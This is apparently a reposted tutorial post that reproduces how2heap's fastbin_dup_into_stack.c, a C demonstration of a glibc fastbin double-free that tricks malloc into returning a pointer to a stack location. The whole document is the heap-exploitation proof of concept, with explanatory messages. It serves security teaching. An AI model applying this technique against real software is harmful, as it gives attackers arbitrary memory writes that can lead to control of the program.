[Original] Understanding how2heap in depth from assembly language

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
            "returning a pointer to a controlled location (in this case, the stack).\n");

    /* The stack variable that will later hold a fake chunk size field. */
    unsigned long long stack_var;

    /* malloc() returns chunk + 16; with the fake size at &stack_var the user
       pointer is 8 bytes past it. */
    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8 + (char *)&stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    /* glibc's only fastbin double-free check compares the chunk with the
       current head of the bin ("double free or corruption (fasttop)"). */
    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    /* a is no longer the head, so the check passes: the bin becomes a -> b -> a. */
    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    /* First half of this format string was lost in extraction; restored from
       how2heap's fastbin_dup_into_stack.c (the four arguments require three
       leading %p conversions). */
    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
            "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *d = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    /* Closing line of this message and its argument restored from how2heap. */
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
            "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
            "so that malloc will think there is a free chunk there and agree to\n"
            "return a pointer to it.\n", a);
    stack_var = 0x20;

    /* d aliases the freed chunk a, so this write sets a's fd pointer to a fake
       chunk whose size field is stack_var (chunk header = prev_size + size). */
    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    /* Popping a once more moves the fake chunk to the head of the fastbin;
       the next malloc(8) passes the size-index check and returns it. */
    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}
Original link: https://bbs.kanxue.com/thread-277530.htm

Reposted from the web. Author of this post: 15h. If you repost it, please credit the source: https://www.15cov.cn/2023/08/27/原创从汇编语言深入理解how2heap_2-23(1)/
